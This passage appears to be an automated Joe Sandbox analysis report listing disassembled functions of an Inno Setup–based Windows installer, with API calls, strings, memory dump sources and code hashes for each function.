                                                                          • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00406FE5
                                                                          • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 0040703D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$NameOpenResourceUniversal
                                                                          • String ID: Z
                                                                          • API String ID: 3604996873-1505515367
                                                                          • Opcode ID: 3e23b715a30e1b5c3429261b8d124dbcf9289215ab71e09fab44fa3001b00485
                                                                          • Instruction ID: 7c0b9131d06079f5eec8a494c30c5fea0581ab0ea086ea85159b160c15df41a2
                                                                          • Opcode Fuzzy Hash: 3e23b715a30e1b5c3429261b8d124dbcf9289215ab71e09fab44fa3001b00485
                                                                          • Instruction Fuzzy Hash: FB514170E042099FDB11EF55C941A9EBBB9FB09304F5041BAE540BB3D1C778AE418F5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044C854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetRectEmpty.USER32(?), ref: 0044C8E2
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C90D
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C995
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$EmptyRect
                                                                          • String ID:
                                                                          • API String ID: 182455014-2867612384
                                                                          • Opcode ID: d0c3e2c7287d8feafc52a027ec46cb3325a20517415fc8e523dc578fc7dbd799
                                                                          • Instruction ID: 131ceb366f2beb704c5e67361b9b215d261598caf296ae96956cdec3368353cb
                                                                          • Opcode Fuzzy Hash: d0c3e2c7287d8feafc52a027ec46cb3325a20517415fc8e523dc578fc7dbd799
                                                                          • Instruction Fuzzy Hash: 8F5172B1900248AFDB50DFA9C885BDEBBF9FF48314F08447AE845EB252D7389944CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042E8C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,00000000,0042EA1C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E8F2
                                                                            • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                          • SelectObject.GDI32(?,00000000), ref: 0042E915
                                                                          • 73A1A480.USER32(00000000,?,0042EA01,00000000,0042E9FA,?,00000000,00000000,0042EA1C,?,?,?,?,00000000,00000000,00000000), ref: 0042E9F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570CreateFontIndirectObjectSelect
                                                                          • String ID: ...\
                                                                          • API String ID: 2998766281-983595016
                                                                          • Opcode ID: 9df2e027a5ad20ed6d7352ee69e297a86736b9e25cbcddb4c0eeddf445b1d3af
                                                                          • Instruction ID: 308711b3510e2d142e5f8917cb1a7286c815dd25c3ebae82bdfc5a56718784f8
                                                                          • Opcode Fuzzy Hash: 9df2e027a5ad20ed6d7352ee69e297a86736b9e25cbcddb4c0eeddf445b1d3af
                                                                          • Instruction Fuzzy Hash: 79315070B00129ABDF11EB9AD841BAEB7B8FF49304F90447BF410A7291D7789E41CA69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0048CE6C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 92registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(?,0048CF6A,?,?,00000001,00000000,00000000,0048CF85), ref: 0048CF53
                                                                          Strings
                                                                          • %s\%s_is1, xrefs: 0048CEE4
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0048CEC6
                                                                          • Inno Setup CodeFile: , xrefs: 0048CF16
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Inno Setup CodeFile: $Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1837835967
                                                                          • Opcode ID: a5317e2cdf1504813c9fe7444e3c67d1a119a8e89a958819ee54ab3caef088f8
                                                                          • Instruction ID: 9198a2c89c650ecdb9ea5b928749e7ef7688678c62cd245957542d324bac4bf5
                                                                          • Opcode Fuzzy Hash: a5317e2cdf1504813c9fe7444e3c67d1a119a8e89a958819ee54ab3caef088f8
                                                                          • Instruction Fuzzy Hash: 9B316374A042045FDB01EFA5DC91A9EBBF9EB4C704F50447BE604E7391D7789A058B68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00416380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
                                                                          • UnregisterClassA.USER32(?,00400000), ref: 0041641B
                                                                          • RegisterClassA.USER32(?), ref: 0041643E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoRegisterUnregister
                                                                          • String ID: @
                                                                          • API String ID: 3749476976-2766056989
                                                                          • Opcode ID: 5b73e54eb71c748753e3b8d1054902b7c0852253915f9ea95734fd2023c17c48
                                                                          • Instruction ID: 182fc5ce89434e719f204c44de6314d23bdba4c1adcba5a9141eaa64fba15999
                                                                          • Opcode Fuzzy Hash: 5b73e54eb71c748753e3b8d1054902b7c0852253915f9ea95734fd2023c17c48
                                                                          • Instruction Fuzzy Hash: F4318E702042008BD760EF68C881B9B77E5AB88308F00447FFA85CB392DB39D9448B6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00492028 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,004928F5,00000000,0049211E,?,?,00000000,00494628), ref: 00492098
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,004928F5,00000000,0049211E,?,?,00000000,00494628), ref: 004920C1
                                                                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004920DA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$Attributes$Move
                                                                          • String ID: isRS-%.3u.tmp
                                                                          • API String ID: 3839737484-3657609586
                                                                          • Opcode ID: bf2922b1aaa6c30ca688b35688b4cf24069c5c6910dd478e72a2b9c309e37070
                                                                          • Instruction ID: b810cc2a7e5d2205544a106a5c70962c88f81ee0cc3f37104223c1277275e24c
                                                                          • Opcode Fuzzy Hash: bf2922b1aaa6c30ca688b35688b4cf24069c5c6910dd478e72a2b9c309e37070
                                                                          • Instruction Fuzzy Hash: 92216470D00219BFDF14EFA9C9829AFBBB9EB54314F10453AB814B72D1D6785E018A59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                          • ExitProcess.KERNEL32 ref: 00404E0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1220098344-2970929446
                                                                          • Opcode ID: a06c2f23053dee05738a3b3847c410c2c592315d1a0ade8e47e6ee14016d8d79
                                                                          • Instruction ID: 4d0016c8d5fe4094e25e5fe0be570a8f0713ad45d294035ab8c8bb1c6a4e5ebc
                                                                          • Opcode Fuzzy Hash: a06c2f23053dee05738a3b3847c410c2c592315d1a0ade8e47e6ee14016d8d79
                                                                          • Instruction Fuzzy Hash: 7421B360A442418ADB21AB75EC81F163BD197EA349F04817BE700B77E6C67C894687AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00454C5C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00454CB0
                                                                          • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00454CDD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                          • String ID: LoadTypeLib$RegisterTypeLib
                                                                          • API String ID: 1312246647-2435364021
                                                                          • Opcode ID: f61e69b483cb001645570106c37636ac553a9824954e6e8b6d66c00c2f183d59
                                                                          • Instruction ID: d9fba730cb80c63aa19026fdd437f4fece929029815e2f29f966a9b9864a7c3d
                                                                          • Opcode Fuzzy Hash: f61e69b483cb001645570106c37636ac553a9824954e6e8b6d66c00c2f183d59
                                                                          • Instruction Fuzzy Hash: C411B430A00604AFDB11DFA6DC51A5EB7BDEBC9709B108476FD04D7651DA389D48C614
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047363C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                          • GetFocus.USER32 ref: 004736A7
                                                                          • GetKeyState.USER32(0000007A), ref: 004736B9
                                                                          • WaitMessage.USER32(?,00000000,004736E0,?,00000000,00473707,?,?,00000001,00000000,?,?,?,?,0047AADF,00000000), ref: 004736C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FocusMessageStateTextWaitWindow
                                                                          • String ID: Wnd=$%x
                                                                          • API String ID: 1381870634-2927251529
                                                                          • Opcode ID: b6f1723f8a55a4a9afafee02d062e7fd811883cc0c30f314c2a81b90cb0acb04
                                                                          • Instruction ID: f4d105e05b809c76e67ff73c629a241912eba9488d1d76ce0f5d4fdfd1301c88
                                                                          • Opcode Fuzzy Hash: b6f1723f8a55a4a9afafee02d062e7fd811883cc0c30f314c2a81b90cb0acb04
                                                                          • Instruction Fuzzy Hash: 67119170600244BFC710EF65DC52A9E7BB8EB49705B5184BAF408E3751D63DAE00DA6D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046A044 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046A04C
                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046A05B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$LocalSystem
                                                                          • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                          • API String ID: 1748579591-1013271723
                                                                          • Opcode ID: dc3105fb6ee909ab4cd4d42845ef41477d175ff5fb8b3213b724df48f3a92d37
                                                                          • Instruction ID: 9e815eb500cce11188de23773c3f03aef7f324e38ca19cda18ee53b31b17b2fc
                                                                          • Opcode Fuzzy Hash: dc3105fb6ee909ab4cd4d42845ef41477d175ff5fb8b3213b724df48f3a92d37
                                                                          • Instruction Fuzzy Hash: 9B11F8A140C3919ED340DF2AC44436BBAE4AB89704F44896EF9D8D6381E779C948DB77
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004527D6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004527E3
                                                                            • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00452808
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesDeleteErrorLastMove
                                                                          • String ID: DeleteFile$MoveFile
                                                                          • API String ID: 3024442154-139070271
                                                                          • Opcode ID: 8a70b1347f387fedb58c3f0c09c3bda5820d5cffeb643f0c2558e4fcea15fbdb
                                                                          • Instruction ID: 7497217c6fa166c3be30eb44807793be619cf2db8189df8da4fe663aa424cbd4
                                                                          • Opcode Fuzzy Hash: 8a70b1347f387fedb58c3f0c09c3bda5820d5cffeb643f0c2558e4fcea15fbdb
                                                                          • Instruction Fuzzy Hash: 8EF062746041045AE701FAA5DA4366FA3ECEB4530AF61403BF800B76C3DA7C9D094929
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00457770 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004578A2,00000000,004579EF,?,00000000,00000000,00000000), ref: 004577BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                          • API String ID: 47109696-2631785700
                                                                          • Opcode ID: 6e8da870c8621b75cc6768b696cde9fcf8d5864872e34247e5d0abe67aef6327
                                                                          • Instruction ID: a26262d4258d3973e1aab989b25d4896129656d7849361439c1335197d99e5e3
                                                                          • Opcode Fuzzy Hash: 6e8da870c8621b75cc6768b696cde9fcf8d5864872e34247e5d0abe67aef6327
                                                                          • Instruction Fuzzy Hash: D5F0FF327141106FC710EB1AFC45F0E6688DB9839AF10803BB940C725AC678DC0AC62D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047DDD8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047DE19
                                                                          • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047DE3C
                                                                          Strings
                                                                          • CSDVersion, xrefs: 0047DE10
                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0047DDE6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                          • API String ID: 3677997916-1910633163
                                                                          • Opcode ID: 7813b641c3abcab23e33f1a9844fd0c9a7e2724cdb6d20ee4d37ca6bcb8a843c
                                                                          • Instruction ID: 975d92485e8303bca6679b963d7ec8b17629a584e5fbb74d879917827c530b39
                                                                          • Opcode Fuzzy Hash: 7813b641c3abcab23e33f1a9844fd0c9a7e2724cdb6d20ee4d37ca6bcb8a843c
                                                                          • Instruction Fuzzy Hash: 5CF0A475E10609AADF11DAD0CC45BEF73BCAF14304F208567EA18EB280E7789A04CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042D7CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004524DE,00000000,00452581,?,?,00000000,00000000,00000000,00000000,00000000,?,0045284D,00000000), ref: 0042D7E6
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D7EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                          • API String ID: 1646373207-4063490227
                                                                          • Opcode ID: bcb006e1001e7ceda0f2158fab1331f88fd866345d5b6bb6a223a4a56a439a00
                                                                          • Instruction ID: 4db8f333c9a0d948aa4d288d669557f69a64c6eaa67e0ad6c3f7b03414b73d9c
                                                                          • Opcode Fuzzy Hash: bcb006e1001e7ceda0f2158fab1331f88fd866345d5b6bb6a223a4a56a439a00
                                                                          • Instruction Fuzzy Hash: 23E04F61B44B1112D7107ABA9C83A5B10898B88724FA0843B79A5E72C7EDBCD94A1A7D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044EFD8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00492971), ref: 0044F013
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F019
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: NotifyWinEvent$user32.dll
                                                                          • API String ID: 1646373207-597752486
                                                                          • Opcode ID: 14387aedca7aefdef0683c3ddaa71b572771d7d4e504a8f70a8313ae2fd5082f
                                                                          • Instruction ID: d5e9afbdc33ce2732c9423c566c922af1deae432a4d89253bf7da83917605eba
                                                                          • Opcode Fuzzy Hash: 14387aedca7aefdef0683c3ddaa71b572771d7d4e504a8f70a8313ae2fd5082f
                                                                          • Instruction Fuzzy Hash: 8DE0ECE0A42344AEFB10BBF6E942B1B2A90E7D571DB10007BB2006A593CB7C040A8A1E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0049273C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004929BD,00000001,00000000,004929E1), ref: 00492746
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0049274C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                          • API String ID: 1646373207-834958232
                                                                          • Opcode ID: 35b9077db0bf85f0e7bfa9aca20f55309094321a33a805c10598d3184199be09
                                                                          • Instruction ID: eaa947335cb6f520d9ee4e24e6959d85bb97eec5577cdd685d5abce296b2953a
                                                                          • Opcode Fuzzy Hash: 35b9077db0bf85f0e7bfa9aca20f55309094321a33a805c10598d3184199be09
                                                                          • Instruction Fuzzy Hash: 31B09280281702748C1032F20E46E1B4888488072571404B73400B10C2CDEC880528AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00460AF4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044AEEC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F009,00492971), ref: 0044AF13
